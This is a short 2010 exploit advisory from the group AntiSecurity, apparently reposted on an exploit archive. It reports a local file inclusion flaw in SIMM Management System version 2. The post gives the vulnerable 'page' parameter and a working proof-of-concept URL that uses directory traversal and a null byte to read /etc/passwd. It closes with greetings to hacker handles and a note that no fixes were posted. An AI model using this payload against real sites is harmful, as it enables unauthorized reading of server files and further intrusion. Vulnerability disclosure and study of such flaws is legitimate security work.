SIMM Management System (SMS) Local File Inclusion Vulnerability

2010-06-03 16:03:13


===================================================================================================


[o] SIMM Management System (SMS) Local File Inclusion Vulnerability

Software : SIMM Management System (SMS) version 2
Vendor : http://anodyne-productions.com/index.php/sms/index
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


===================================================================================================


[o] Exploit

http://localhost/[path]/index.php?page=[LFI]


[o] PoC

http://localhost/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00


===================================================================================================


[o] Greetz

Angela Zhang stardustmemory aJe wishnusakti inc0mp13te pizzyroot
kaka11 matthews xrootboy martfella Genex H312Y }^-^{ k1tk4t str0ke
ArRay bjork xmazinha veter f1 akatsuchi N4ck0
all people in #evilc0de [at] irc.byroe.net


===================================================================================================


[o] June 02 2010 - GMT +07:00 Jakarta, Indonesia

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.